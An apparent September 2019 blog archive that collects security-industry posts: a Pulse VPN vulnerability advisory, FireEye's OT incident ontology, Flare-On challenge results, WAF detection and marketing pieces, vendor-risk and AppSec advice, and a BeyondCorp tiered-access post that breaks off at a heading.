Monthly Archives: September 2019

Advisory – 2019-129: File Disclosure Vulnerability in Pulse Connect Secure VPN Software

Overview The Australian Signals Directorate’s Australian Cyber Security Centre is aware of a vulnerability that exists in the Pulse Connect Secure Virtual Private Network (VPN) solution. We advise users to ensure their systems are patched and up to date. The Pulse VPN Vulnerability, also known as CVE-2019-11510, was initially disclosed in April 2019 but has resurfaced after multiple reports of exploitation and the disclosure of working exploits available for use on Pastebin and GitHub.

The FireEye OT-CSIO: An Ontology to Understand, Cross-Compare, and Assess Operational Technology Cyber Security Incidents

The FireEye Operational Technology Cyber Security Incident Ontology (OT-CSIO)

While the number of threats to operational technology (OT) have significantly increased since the discovery of Stuxnet – driven by factors such as the growing convergence with information technology (IT) networks and the increasing availability of OT information, technology, software, and reference materials – we have observed only a small number of real-world OT-focused attacks. The limited sample size of well-documented OT attacks and lack of analysis from a macro level perspective represents a challenge for defenders and security leaders trying to make informed security decisions and risk assessments.

To help address this problem, FireEye Intelligence developed the OT Cyber Security Incident Ontology (OT-CSIO) to aid with communication with executives, and provide guidance for assessing risks. We highlight that the OT-CSIO focuses on high-level analysis and is not meant to provide in-depth insights into the nuances of each incident.

Our methodology evaluates four categories, which are targeting, impact, sophistication, and affected equipment architecture based on the Purdue Model (Table 7). Unlike other methodologies, such as MITRE's ATT&CK Matrix, FireEye Intelligence's OT-CSIO evaluates only the full aggregated attack lifecycle and the ultimate impacts. It does not describe the tactics, techniques, and procedures (TTPs) implemented at each step of the incident. Table 1 describes the four categories. Detailed information about each class is provided in Appendix 1.

Table 1: Categories for FireEye Intelligence's OT-CSIO

The OT-CSIO In Action

In Table 2 we list nine real-world incidents impacting OT systems categorized according to our ontology. We highlight that the ontology only reflects the ultimate impact of an incident, and it does not account for every step throughout the attack lifecycle. As a note, we cite public sources where possible, but reporting on some incidents is available to FireEye Threat Intelligence customers only.





Impacted Equipment

Maroochy Shire Sewage Spill





Zone 3






Zones 1-2






Zone 4-5

Ukraine Power Outage




Disruption, Destruction

Zone 2

Ukraine Power Outage





Zones 0-3

WannaCry Infection on HMIs





Zone 2-3

TEMP.Isotope Reconnaissance Campaign




Data Theft

Zones 2-4





Disruption (likely building destructive capability)

Zone Safety, 1-5

Cryptomining Malware on European Water Utility





Zone 2/3

Financially Motivated Threat Actor Accesses HMI While Searching for POS Systems





Zone 2/3

Portable Executable File Infecting Malware Impacting Windows-based OT assets





Zone 2-3

Table 2: Categorized samples using the OT-CSIO

The OT-CSIO Matrix Facilitates Risk Management and Analysis

Risk management for OT cyber security is currently a big challenge given the difficulty of assessing and communicating the implications of high-impact, low-frequency events. Additionally, multiple risk assessment methodologies rely on background information to determine case scenarios. However, the quality of this type of analysis depends on the background information that is applied to develop the models or identify attack vectors. Taking this into consideration, the following matrix provides a baseline of incidents that can be used to learn about past cases and facilitate strategic analysis about future case scenarios for attacks that remain unseen, but feasible.

Table 3: The FireEye OT-CSIO Matrix

As Table 3 illustrates, we have only identified examples for a limited set of OT cyber security incident types. Additionally, some cases are very unlikely to occur. For example, medium- and high-sophistication non-targeted incidents remain unseen, even if feasible. Similarly, medium- and high-sophistication data compromises on OT may remain undetected. While this type of activity may be common, data compromises are often just a component of the attack lifecycle, rather than an end goal.

How to Use the OT-CSIO Matrix

The OT-CSIO Matrix presents multiple benefits for the assessment of OT threats from a macro level perspective given that it categorizes different types of incidents and invites further analysis on cases that have not yet been documented but may still represent a risk to organizations. We provide some examples on how to use this ontology:

  • Classify different types of attacks and develop cross-case analysis to identify differences and similarities. Knowledge about past incidents can be helpful to prevent similar scenarios and to think about threats that have not been evaluated by an organization.
  • Leverage the FireEye OT-CSIO Matrix for communication with executives by sharing a visual representation of different types of threats, their sophistication and possible impacts. This tool can make it easier to communicate risk despite the limited data available for high-impact, low-frequency events. The ontology provides an alternative to assess risk for different types of incidents based on the analysis of sophistication and impact, where increased sophistication and impact generally equates to higher risk.
  • Develop additional case scenarios to foresee threats that have not been observed yet but may become relevant in the future. Use this information as support while working on risk assessments.


FireEye Intelligence's OT-CSIO seeks to compile complex incidents into practical diagrams that facilitate communication and analysis. Categorizing these events is useful for visualizing the full threat landscape, gaining knowledge about previously documented incidents, and considering alternative scenarios that have not yet been seen in the wild. Given that the field of OT cyber security is still developing, and the number of well-documented incidents is still low, categorization represents an opportunity to grasp tendencies and ultimately identify security gaps.

Appendix 1: OT-CSIO Class Definitions


This category comprises cyber incidents that target industrial control systems (ICS) and non-targeted incidents that collaterally or coincidentally impact ICS, such as ransomware.

Table 4: Target category


Sophistication refers to the technical and operational sophistication of attacks. There are three levels of sophistication, which are determined by the analyst based on the following criteria.

Table 5: Sophistication category


The ontology reflects impact on the process or systems, not the resulting environmental impacts. There are five classes in this category, including data compromise, data theft, degradation, disruption, and destruction.

Table 6: Impact category

Impacted Equipment

This category is divided based on FireEye Intelligence's adaptation of the Purdue Model. For the purpose of this ontology, we add an additional zone for safety systems.

Table 7: Impacted equipment

2019 Flare-On Challenge Solutions

We are pleased to announce the conclusion of the sixth annual Flare-On Challenge. The popularity of this event continues to grow and this year we saw a record number of players as well as finishers. We will break down the numbers later in the post, but right now let’s look at the fun stuff: the prize! Each of the 308 dedicated and amazing players that finished our marathon of reverse engineering this year will receive a medal. These hard-earned awards will be shipping soon. Incidentally, the number of finishers smashed our estimates, so we have had to order more prizes.

We would like to thank the challenge authors individually for their great puzzles and solutions.

  1. Memecat Battlestation: Nick Harbour (@nickaharbour)
  2. Overlong: Eamon Walsh
  3. FlareBear: Mortiz Raabe (@m_r_tz)
  4. DnsChess: Eamon Walsh
  5. 4k demo: Christopher Gardner (@t00manybananas)
  6. Bmphide: Tyler Dean (@spresec)
  7. Wopr: Sandor Nemes (@sandornemes)
  8. Snake: Alex Rich (@AlexRRich)
  9. Reloaderd: Sebastian Vogl
  10. MugatuWare: Blaine Stancill (@MalwareMechanic)
  11. vv_max: Dhanesh Kizhakkinan (@dhanesh_k)
  12. help: Ryan Warns (@NOPAndRoll)

And now for the stats. As of 10:00am ET, participation was at an all-time high, with 5,790 players registered and 3,228 finishing at least one challenge. This year had the most finishers ever with 308 players completing all twelve challenges.

The U.S. reclaimed the top spot of total finishers with 29. Singapore strengthened its already unbelievable position of per-capita top Flare-On finishing country with one Flare-On finisher per every 224,000 persons living in Singapore. Rounding out the top five are the consistent high-finishing countries of Vietnam, Russia, and China.


All the binaries from this year’s challenge are now posted on the Flare-On website. Here are the solutions written by each challenge author:

  1. SOLUTION #1
  2. SOLUTION #2
  3. SOLUTION #3
  4. SOLUTION #4
  5. SOLUTION #5
  6. SOLUTION #6
  7. SOLUTION #7
  8. SOLUTION #8
  9. SOLUTION #9
  10. SOLUTION #10
  11. SOLUTION #11
  12. SOLUTION #12

Know Your Audience to Make the Case for AppSec

Selling senior-level executives on any new concept can often feel like a trek up a mountain with a 60-pound pack on your back. So, how can you take your application security program to a new and better level with less effort? You focus on what’s really important: getting the right message to the right audience in a language they speak and connect with. Because when people hear things in terms that matter to them — and there’s persuasive evidence on hand — they stop resisting and even embrace the change.

But sending one message to the multiple leaders involved in a decision-making process is a mistake. Refining your message appropriately by focusing on the information relevant to each group will help you build credibility, more effectively communicate your vision, and more easily gain buy-in. It’s an approach that extends far beyond AppSec, but it has particular relevancy in this space.

On Target

Any successful salesperson understands that it’s easier to close a sale when you communicate selling points that really matter to your audience. The same holds true when you are “selling” AppSec internally. Your success hinges on understanding your strategic arc over the course of months and years, establishing metrics and KPIs that demonstrate your progress, and connecting all of this to tangible benefits for the people who hold the purse strings and can greenlight your initiative, and whose support you need for the successful implementation and administration of your program.

You can gain the support you need by building a basic business case for the key groups in your organization, and ensuring that each stakeholder receives the specific information they need in words, figures, and graphics they understand. Whether it’s showing them how your AppSec program cuts costs, scales up efficiencies, fuels your DevOps strategies, or improves the company’s overall trust with business partners and customers, hitting the target matters. It’s crucial to document actual problems and incidents, and then use company data to support your case.

First Things First

Here are six key ways to gain C-suite executive buy-in for AppSec:

  • Avoid acronyms and technical jargon. Nothing confuses and distracts business leaders more than the use of unnecessary technical terms.
  • Use visuals instead of text. Display risks and potential costs in graphics that clearly illustrate potential losses and damage. Rely on numbers, and especially actual dollar figures, to gain credibility. And be sure to refine your message appropriately for each executive. For example, telling your CFO that you’ve reduced SQL injection vulnerabilities by 30 percent most likely won’t resonate. Your CFO wants to know the actual business value of reducing breaches. The CISO wants to understand how AppSec ties into the overall information security program, and the CIO is concerned with the cost of deliver/service and the cost of downtime. Know your audience’s priorities, and speak their language.
  • Forget “features” and emphasize “risks.” Avoid a discussion about specific security products and what they can do —you run the risk of being seen simply as a technologist rather than a strategic partner. Instead, build a case around potential brand damage with industry metrics, benchmarks, and potential costs. Nearly two-thirds of company directors who responded to a Veracode and NYSE Governance Services survey said they prefer high-level strategy descriptions and risk metrics over information about security technologies.
  • Identify your organization’s pain points. Find a compelling event, such a recent high-profile security breach, a prospect asking for a security audit, or even a lost sale due to security issues. Present actual data from past incidents to demonstrate how your organization will benefit with AppSec.
  • Pinpoint pet projects. Find something key stakeholders have a burning interest in, and make that your focus. For instance, if your organization’s customers are expressing concerns about privacy and security to your customer service reps, and one of your stakeholders is taking the lead on that issue, attach your cause to that issue. Quantifying the extent of the problem and presenting it to your leaders in a way that clearly illustrates how effective your solutions could be will likely sway decision-makers in your favor.
  • Focus on dollars. The same survey noted above found that among the 200 directors of public companies across a wide swath of industries who responded, 41 percent cited the cost of brand damage — including cleanup, lawsuits, forensics, and credit reporting costs — as a top concern.

Ultimately, anyone selling an AppSec program to their organization’s top decision-makers should take the time to identify risk benchmarks as compared to their industry peers — and what these mean in both practical terms and actual dollars. A focus on real-world issues and results, tied to what matters for specific stakeholders, can significantly boost your odds of success.

For more information about how to promote AppSec, check out our new guide, Building a Business Case for Expanding Your AppSec Program

5 Steps to Managing Security Risks Associated with Your Partners & Vendors

Today most businesses find themselves in the position of requiring a strategic partnership with a third-party to address many different business needs and requirements. These partnerships provide a benefit to the primary company typically in the form of cost savings (labor/operational), increased quality of product or service, or an increased speed with which the product or service is delivered. Additionally, partnerships may be used to address deficiencies within the business operation such as a talent shortage. Organizations may even be compelled to partner with a third-party by industry or regulatory compliance mandates as is the case with PCI-DSS or GLBA to name a couple examples.

These strategic partnerships certainly provide a benefit to the primary organization, but also introduce an additional level of risk. A Soha Systems survey indicates 63 percent of all data breaches are linked directly or indirectly to third-party access. From a network and information security stance, an organization’s security posture is only as strong as its weakest link.

We’ve seen headlines in the news that illustrate this time and time again.  Take, for instance, the recent DoorDash breach that exposed the data of 4.9M merchants, customers, and workers as a result of a third-party service provider.  Or the infamous 2013 Target breach in which Target’s corporate network was compromised through a contracted third-party HVAC company, Fazio Mechanical. The attack initiated through a phishing email which led to malware installation on Fazio Mechanical’s systems and continued until the attackers had infected Target’s POS terminals and customer data was stolen. Through relaxed security policies, practices, and implementations with both parties, Target experienced costs to the corporation in the form of an $18.5M lawsuit settlement, damage to the company’s reputation and resulting lost business, as well as the resources expended to significantly improve their security posture to reduce the possibility of future attacks.

Even if the security risk started with or is wholly due to a service provider’s lax security posture, the primary organization will ultimately bear responsibility for the breach, especially in the mind of the customer. From a legal standpoint, the main organization may often find it difficult to demonstrate that sufficient steps were taken to manage its third-party risk and could be considered liable for the breach and therefore held responsible for the ensuing costs of remediation.

It can be a difficult task to mitigate the inherited risks associated with a company’s security posture over which you have little control. Naturally, how a given organization manages any risk will depend greatly on the business requirements and goals of that organization.

The following are steps any organization can take to begin the process of managing third-party risks:

Step 1: Obtain Executive leadership buy-in and support.

This is essential for any risk management program to succeed.  Leadership support will provide necessary oversight and will stress the importance of this endeavor to the entire organization.

Step 2: Perform a thorough in-house risk and vulnerability assessment to gauge your organization’s security posture.

Implement any needed changes and address any deficiencies to your own organization’s acceptable risk level.

Step 3: Evaluate the security policies, procedures, and implementations of current partners to assess the risk they may pose to your organization.

If deficiencies are discovered, have conversations with the partner organization to address these gaps.  This may involve revisiting current contracts.

Step 4: Prior to contracting with potential vendors, investigate the security practices of these organizations and discuss expectations of how information security will be handled should a partnership be realized.

Due  diligence is vital in evaluating the security posture and risks posed by these potential alliances.

Step 5: To remain successful, implement a risk management program that includes ongoing risk measurement and evaluation through auditing and monitoring.

New risks and vulnerabilities may appear at any time and an organization must be adaptable to these changes.

It’s not all doom and gloom when it comes to third-party partnerships.  After all, they can provide significant value to business operations. The important takeaway is their risks are your risks, and your organization will bear the burden should an accident occur. By implementing a risk management program following the steps above, you can mitigate third-party risk, providing you peace of mind and long-term success.

The post 5 Steps to Managing Security Risks Associated with Your Partners & Vendors appeared first on GRA Quantum.

GRA Quantum Named to 2019 MSSP Alert Top 200 Managed Security Services Providers List

Third Annual List Honors Leading MSSPs, MDR Service Providers & Cybersecurity Companies

Salt Lake City, UT., Sept. 24, 2019 — MSSP Alert, published by After Nines Inc., has named GRA Quantum to the Top 200 MSSPs list for 2019 ( The list and research identify and honor the top 200 managed security services providers (MSSPs) that specialize in comprehensive, outsourced cybersecurity services.

Previous editions of the annual list honored 100 MSSPs. This year’s edition, at twice the size, reflects MSSP Alert’s rapidly growing readership and the world’s growing consumption of managed security services. MSSP Alert’s readership has grown every month, year over year, since launching in May 2017.

The Top 200 MSSP rankings are based on MSSP Alert’s 2019 readership survey combined with aggregated third-party research. MSSPs featured throughout the list and research proactively monitor, manage and mitigate cyber threats for businesses, government agencies, educational institutions and nonprofit organizations of all sizes.

“We’re honored to be recognized in MSSP Alert’s Top 200 MSSPs list after having only launched our Security Operations Center and Managed Security Services in 2018,” said Tom Boyden, President, GRA Quantum. “We pride ourselves in our dedication to offer comprehensive, enterprise-level MSS solutions to small and mid-sized firms.”

“Our technology-agnostic approach sets us apart from most MSS vendors,” added Jen Greulich, Director, Managed Security Services, GRA Quantum. “This allows us to select the best tools for our clients and seamlessly integrate into their existing technologies.”

“After Nines Inc. and MSSP Alert congratulate GRA Quantum on this year’s honor,” said Amy Katz, CEO of After Nines Inc. “Amid the ongoing cybersecurity talent shortage, thousands of MSPs and IT consulting firms are striving to move into the managed security market. The Top 200 list honors the MSSP market’s true pioneers.”

Learn more about GRA Quantum’s Managed Security Services.


MSSP Alert: Top 200 MSSPs 2019 – Research Highlights

The MSSP Alert readership survey revealed several major trends in the managed security services provider market. Chief among them:

  • The Top 5 business drivers for managed security services are talent shortages; regulatory compliance needs; the availability of cloud services; ransomware attacks; and SMB customers demanding security guidance from partners.
  • 69% of MSSPs now run full-blown security operations centers (SOCs) in-house, with 19% leveraging hybrid models, 8% completely outsourcing SOC services and 4% still formulating strategies.
  • The Top 10 cybersecurity vendors assisting MSSPs, in order of reader preference, are Fortinet, AT&T Cybersecurity, Cisco Systems, BlackBerry Cylance, Palo Alto Networks, Microsoft, SonicWall, Carbon Black, Tenable and Webroot (a Carbonite company).
  • Although the overall MSSP market enjoys double-digit percentage growth rates, many of the Top 200 MSSPs have single-digit growth rates because they are busy investing in next-generation services – including managed detection and response (MDR), SOC as a Service, and automated penetration testing.

The Top 200 MSSPs list and research are overseen by Content Czar Joe Panettieri (@JoePanettieri). Find the online list and associated report here:

About After Nines Inc.

After Nines Inc. provides timeless IT guidance for strategic partners and IT security professionals across ChannelE2E ( and MSSP Alert (  ChannelE2E tracks every stage of the IT service provider journey — from entrepreneur to exit. MSSP Alert is the global voice for Managed Security Services Providers (MSSPs).

  • For sponsorship information contact After Nines Inc. CEO Amy Katz,
  • For content and editorial questions contact After Nines Inc. Content Czar Joe Panettieri,

The post GRA Quantum Named to 2019 MSSP Alert Top 200 Managed Security Services Providers List appeared first on GRA Quantum.

Scientists invent new technology to print invisible messages

Messages can only be seen under UV light and can be erased using a hairdryer

Forget lemon juice and hot irons, there is a new way to write and read invisible messages – and it can be used again and again.

The approach, developed by researchers in China, involves using water to print messages on paper coated with manganese-containing chemicals. The message, invisible to the naked eye, can be read by shining UV light on the paper.

Continue reading...

What Types of Threat Detection Technologies Are There for WAF (Web Application Firewall) Solutions?

Threat detection is at the core of a WAF’s capabilities to accurately identify and block incoming attacks. However, not all threat engines are built the same.

Many WAF vendors use ModSecurity’s engine, an open-source web application firewall, for their core ruleset. 

This core rule set contains a set of generic attack detection rules that provide protection against many common attack categories, including SQL Injection (SQLi), Cross Site Scripting (XSS), Local File Inclusion (LFI), Remote File Inclusion (RFI), and more. 

As mentioned, ModSecurity’s threat detection engine is a free-to-use, open software that forms the basis of many WAF engines. 

However, there are some WAF vendors using their own proprietary technology that doesn’t just rely on ModSecurity’s core rule set to protect web applications against zero-day type attacks and other sophisticated web attacks.  

Some of these techniques and methods include using signatures, application learning, and AI.

Take a look below at some of the threat detection techniques that are being applied for WAFs and decide for yourself what kind of WAF might be able to withstand today’s evolving threat landscape. 

Signature-based threat detection

Signature-based (or pattern-matching) models are mostly associated with traditional WAFs. 

A signature represents a pattern containing pieces of code that make up a known attack on an operating system, web server, or website.

A signature-based WAF will take a string of suspicious code and run it against its signatures. And if it matches a signature, it is subsequently blocked. 

Sounds simple enough. 

However, this may create problems such as false positives and false negatives. This can also possibly block actual users from getting access to the web application (i.e. website). Furthermore, if a malicious string of code is not recognized because no signature for it exists, then it also goes undetected and does not get blocked by the threat detection engine. 

Hackers can easily add code to the string that does not match any of the signatures, thereby bypassing the firewall and accessing the web application. 

As a result, signature-based WAFs are only able to protect applications from known vulnerabilities and cannot effectively protect against new web attacks.

Signature-free/signature-less threat detection

In general, third-generation WAFs will want to use both signature (pattern matching) techniques and “signature-less” techniques for threat detection.

A signature-less or signature-free WAF simply means that the WAF’s threat engine does rely on signatures to identify and block attacks. 

Instead the WAF uses its own rulesets (either combined with ModSecurity’s core rule set or rule set developed in-house) to intelligently identify the characteristics of an attack that does not rely on signatures. 

This type of WAF threat engine can detect while blocking unknown vulnerabilities, protecting applications from never-before-seen threats.

This is not to say that signature-based models are not useful. However, unless there are regular updates to the signatures, those not updated become less useful over time. Updates may also incur additional costs. 

With signature-free techniques, signature updates are not required. For WAF customers, this means more cost savings.

Application learning/behavior-based threat detection

The parameter of an application includes value ranges for form fields, HTTP methods, cookies, etc. 

An application learning model develops a “profile” by looking at data entries and other facets of the behaviors of users as it relates to each of these parameters. 

A behavior-based WAF can detect whether or not an application is behaving the way it should through these parameters. User actions are compared against expected behaviors to recognize anomalies and then trigger alerts. 

Over time, as the WAF’s threat engine updates these profiles by gathering more data on user behavior, the application-learning technology monitors responses to certain data inputs to learn what responses to expect in the future. 

Behavior not within this profile scope and previously unobserved by the WAF threat engine triggers an alert to the security team.

Behaviors that trigger an alert even though it’s not malicious might cause incoming web application traffic to be blocked entirely. So when a new trend emerges, it may be blocked until an actual person can review the trend and decide whether it’s truly a threat or not. 

This creates several problems. First, this means more resources (i.e. people) are required to manage the WAF engine due to the manual checkups. Second, it can increase the false positive rate.

While these setbacks are also associated with conventional WAFs, a behavior-based WAF is still a significant improvement. 

As the WAF’s threat engine gathers more information on user behavior, the profile gets updated to learn what types of responses (i.e grant or block access) to give. 

Artificial intelligence (AI)/machine learning-based threat detection

Reducing the high resource requirements sometimes needed in managing a WAF is something most companies seek to avoid.  

To combat the human resource issue, machine learning powered-automated tasks can be created to constantly learn the newest data (threat data or otherwise) without human intervention.

Machine learning enables the WAF engine to classify files and data sources much more accurately and distinguish between legitimate and illegitimate threats. 

Very few WAFs have incorporated this type of machine learning that uses an “automated calculation of the probability that a user or application behavior represents a threat requiring a security response.” 

The WAF in turn, uses these predefined rules that ultimately determine the likelihood of the threat to respond to any behavior anomalies. 

This significantly reduces false positives as compared to application learning and also reduces the need to allocate valuable staff resources to resolve false positives issues.

Machine learning can build predictive models to detect similarities between attack patterns and discover unknown patterns.

Deep learning-based threat detection

As a subset of machine learning, deep learning for WAF threat detection is just beginning to be explored. 

Deep learning methods are already being used for Intrusion Detection Systems (IDS) in the cybersecurity arena.

One way deep learning is being used to detect web attacks is through the usage of a CNN (Convolutional Neural Network), which can be used specifically to analyze HTTP request packets. This makes it possible to also analyze a diverse set of attack inputs and data.

CNN is widely used in computer vision area and image-related tasks. In one example, deep learning capabilities are being used to convert web attacks into in UTF-8 hexadecimal format. 

It is then turned into an image and is fed into a deep learning machine.  With this, the machine will be able to recognize web traffic and learn as more data is fed through it. Read more. 

Combined with core WAF capabilities, deep learning can enhance the threat detection of any WAF to more intelligently find new types of web attacks and also accurately distinguish legitimate users and illegitimate users.


WAF technologies are now evolving to meet the new and more sophisticated types of web threats that are arising across organizations. 

Some of the ways in which WAFs are evolving is the incorporation of new technologies to their threat engines as they move away from traditional signatures to include application learning/behavioral analysis methods, signature-free methods, and AI. 

Furthermore, big data is also making its way into WAF threat engines. One way it is being used is through the analysis of global threats across individual clients’ WAFs to be a block one kind of attack and apply it rapidly to other clients. 

Now that the threat landscape calls for more precise detection of both known and unknown attacks, it seems like organizations will also seek to deploy WAFs that hold greater capabilities than their predecessors. 

The post What Types of Threat Detection Technologies Are There for WAF (Web Application Firewall) Solutions? appeared first on Cloudbric.

SB220 Nevada Law

The Privacy Security and Risk Conference is next week in Las Vegas. While the conversation will most likely be dominated by the California Consumer Privacy Act (CCPA), there is another privacy law that should probably be on the agenda as well. That’s right, Nevada also has a new privacy law, specifically SB220. This new privacy […]

The post SB220 Nevada Law appeared first on Privacy Ref.

Security and Development Agree, Coordinated Disclosures Are a Public Service

Shifting security left so that security testing becomes an integrated part of the development process helps companies improve software security. With software running our world, it is important to empower developers with the tools and processes they need to make security a part of their overall development process. Yet, even with a robust AppSec program that makes security a part of the development process, new vulnerabilities are found all the time. Companies need ways to find vulnerabilities once software is released. That’s where coordinated disclosure policies come into play.

Coordinated disclosure policies allow security researchers to work with an organization to help them improve the security of their software. The conversation around vulnerability disclosure has become more nuanced over the past several years. What was once a topic that would spur intense debate is now one that invites discussion on strategy and best practices. Organizations as conservative as federal and state agencies are exploring the need for coordinated disclosure processes.

Veracode recently commissioned a report with 451 Group to explore the attitudes and perceptions around coordinated disclosure. Our intent in commissioning this research was to establish a current view of perceptions around coordinated vulnerability disclosure and to define a set of clear recommendations that help businesses progressively deliver on the objective of developing software that is secure from the start.

The report showed that 90 percent of security and development professionals believe coordinated disclosure serves a public good. This same report also found that one-third of organizations received an unsolicited vulnerability alert in the past 12 months – and that 90 percent of these were done in a coordinated manner, in which the independent security researcher worked with the company to fix the vulnerability.

As Chris Wysopal, Veracode CTO, commented on the report:

“The alignment that the study reveals is very positive,” said Veracode Chief Technology Officer and co-founder Chris Wysopal. “The challenge, however, is that vulnerability disclosure policies are wildly inconsistent. If researchers are unsure how to proceed when they find a vulnerability it leaves organizations exposed to security threats giving criminals a chance to exploit these vulnerabilities. Today, we have both tools and processes to find and reduce bugs in software during the development process. But even with these tools, new vulnerabilities are found every day. A strong disclosure policy is a necessary part of an organization’s security strategy and allows researchers to work with an organization to reduce its exposure. A good vulnerability disclosure policy will have established procedures to work with outside security researchers, set expectations on fix timelines and outcomes, and test for defects and fix software before it is shipped.”

Past perceptions around independent security researchers were that they were motivated by money from bug bounty programs or would blackmail a company into paying them for the vulnerability information. This study showed that this perception is far from the truth. Only 18 percent of security researchers expect to be paid for finding a vulnerability, and only 16 percent expect some sort of recognition. Conversely, 37 percent expect information validating the fix – suggesting independent researchers are more interested in creating more secure software than notoriety or financial gain.

The good news is most companies today have an established process for working with independent security researchers. When coordinated disclosure programs become part of an overall software security strategy along with a DevSecOps program that integrates security testing right into the development process, we all benefit from the software powering our world being more secure.

See highlights from the report’s findings in the infographic below.


What Are Some Barriers That Web Hosting Providers Face in Deploying a WAF?

Website owners rely on web hosting providers to get their websites up and running online. 

But here’s the thing that may stumble some website owners: Hosting providers are only responsible for protecting the server in which websites are hosted, but customers will need to protect their own websites within the server. 

Bottom line: Web hosting providers are not responsible for the security of websites themselves.

What some web hosting providers may not realize is that the level of security that a web hosting service offers is extremely important to a prospective customer.

Depending on their needs, customers may be looking to see whether a web hosting provider offers SSL, backups, DDoS mitigation, firewalls, and more. 

Web hosting providers may choose instead to focus on offering content management systems (WordPress, Drupal, Joomla etc.) rather than any web security tools. 

This blog post will discuss some of the concerns web hosting providers may have in partnering with a security vendor specifically to offer a WAF (Web Application Firewall). What are some barriers to entry and how can Cloudbric make the transition smoother compared to other WAF vendors?

1) Extremely long learning curve 

First, web hosting providers may be worried about the deployment and management requirements that come with installing and utilizing a WAF. 

Before they can extend security to their customers, web hosters are faced with a slight learning curve when configuring a WAF for the first time or when creating custom policy rules that fit their security needs.

Regardless of the WAF vendor that a web hoster ultimately partners with, there will be some kind of learning curve. Luckily WAF security vendors like Cloudbric seek to minimize management requirements by providing flexible deployment models.

With API integrations available for web hosting providers, these web hosting companies can easily integrate Cloudbric’s APIs into their WAF service sign up process to offer WAF as an add-on security service into their hosting plans. 

2) Perceived need for multiple security personnel needed to deploy and maintain WAF

The primary business model that web hosting providers profit the most is from hosting websites on their servers. They have thousands of clients they manage and must keep happy.

Some of their responsibilities include guaranteeing high reliability/uptime in addition to providing technical support. 

Depending on the size of the web hosting firm, web hosters may feel like they need a big security team to deploy and maintain WAF. However, there are many security vendors out there that offer fully managed WAFs such as Cloudbric. 

The management of WAF can be very low which allows IT personnel to just “set it and forget it.” This means web hosters do only the minimal work but at the same time still benefit from having an additional source of monthly revenue by extending web application security to their customers.

3) Complex UI/UX

UI/UX is extremely important to almost every software user out there. For WAFs, it’s no different. Most web hosting providers want a seamless experience when using a WAF console in order to manage customers and disseminate threat information easily. 

Furthermore, end users themselves should be able to login to their own dashboards and understand their web attacks and perform basic security settings such as IP blocking.

One added benefit for web hosting providers is expending far fewer resources to reach those insights.

Cloudbric’s user-friendly WAF console makes it easy for web hosting providers to manage all client websites.

Learn more by requesting a demo with Cloudbric. 

4) Upkeep costs

For web hosters, there is always the fear of additional upkeep costs, upgrades, and other “hidden” costs.

Most web hosters are interested in making a return on investment (ROI) but will need to consider the total cost of ownership should they choose to provide WAF to their customers as an add-on security service. 

(Contact us to get a quote and see for yourself  how Cloudbric offers the cheapest WAF compared to other vendors.)

The total cost of ownership includes more than just the product purchase. For WAFs, there might be installation fees and upkeep fees to worry about. Upkeep costs may include hardware or software updates. 

Fortunately, with cloud-based options like Cloudbric, there is zero hardware required to install or maintain an exclusive WAF. 

Furthermore, there is no need to worry about management costs such as day-to-day tasks including any configurations, policy updates etc. Cloudbric’s security team of experts can handle all of this for web hosting providers. 

Finally, signature updates for the WAF technology itself are also not necessary because Cloudbric uses signature-free and AI techniques to detect threats.


For web hosting companies with a low-profit margin, adding complementary security services to their paid hosting plans can create new streams of revenue. 

Web hosting companies may be interested in distributing WAF to their customers but are hesitant to do so due to perceived barriers to entry. 

However, as we explored in this blog post, these barriers such as a need for a specialized security team, complex UI/UX, and upkeep costs, can all be addressed with the right WAF vendor.

If you’re a web hosting service provider, and if you’d like to talk to one of our security experts in more detail,  fill out the form below! No commitments whatsoever. 


The post What Are Some Barriers That Web Hosting Providers Face in Deploying a WAF? appeared first on Cloudbric.

YouTube’s fine and child safety online | Letters

Fining YouTube for targeting adverts at children as if they were adults shows progress is being made on both sides of the Atlantic, writes Steve Wood of the Information Commissioner’s Office

The conclusion of the Federal Trade Commission investigation into YouTube’s gathering of young people’s personal information (‘Woeful’ YouTube fine for child data breach, 5 September) shows progress is being made on both sides of the Atlantic towards a more children-friendly internet. The company was accused of treating younger users’ data in the same way it treats adult users’ data.

YouTube’s journey sounds similar to many other online services: it began targeting adults, found more and more children were using its service, and so continued to take commercial advantage of that. But the allegation is it didn’t treat those young people differently, gathering their data and using it to target content and adverts at them as though they were adult users.

Continue reading...

How Google adopted BeyondCorp: Part 3 (tiered access)


This is the third post in a series of four, in which we set out to revisit various BeyondCorp topics and share lessons that were learnt along the internal implementation path at Google.

The first post in this series focused on providing necessary context for how Google adopted BeyondCorp, Google’s implementation of the zero trust security model. The second post focused on managing devices - how we decide whether or not a device should be trusted and why that distinction is necessary. This post introduces the concept of tiered access, its importance, how we implemented it, and how we addressed associated troubleshooting challenges.

High level architecture for BeyondCorp

What is Tiered Access?

In a traditional client certificate system, certificates are only given to trusted devices. Google used this approach initially as it dramatically simplified device trust. With such a system, any device with a valid certificate can be trusted. At predefined intervals, clients prove they can be trusted and a new certificate is issued. It’s typically a lightweight process and many off-the-shelf products exist to implement flows that adhere to this principle.

However, there are a number of challenges with this setup:
  • Not all devices need the same level of security hardening (e.g. non-standard issue devices, older platforms required for testing, BYOD, etc.).
  • These systems don’t easily allow for nuanced access based on shifting security posture.
  • These systems tend to evaluate a device based on a single set of criteria, regardless of whether devices require access to highly sensitive data (e.g. corporate financials) or far less sensitive data (e.g. a dashboard displayed in a public space).
The next challenge introduced by traditional systems is the inherent requirement that a device must meet your security requirements before it can get a certificate. This sounds reasonable on paper, but it unfortunately means that existing certificate infrastructure can’t be used to aid device provisioning. This implies you must have an additional infrastructure to bootstrap a device into a trusted state.

The most significant challenge is the large amount of time in between trust evaluations. If you only install a new certificate once a year, this means it might take an entire year before you are able to recertify a device. Therefore, any new requirements you wish to add to the fleet may take up to a year before they are fully in effect. On the other hand, if you require certificates to be installed monthly or daily, you have placed a significant burden on your users and/or support staff, as they are forced to go through the certification issuance process far more often, which can be time consuming and frustrating. Additionally, if a device is found to be out of compliance with security policy, the only option is to remove all access by revoking the certificate, rather than degrading access, which can create a frustrating all-or-nothing situation for the user.

Tiered access attempts to address all these challenges, which is why we decided to adopt it. In this new model, certificates are simply used to provide the device’s identity, instead of acting as proof of trust. Trust decisions are then made by a separate system which can be modified without interfering with the certificate issuance process or validity. Moving the trust evaluation out-of-band from the certificate issuance allows us to circumvent the challenges identified above in the traditional system. Below are three ways in which tiered access helps address these concerns.

Different access levels for different security states

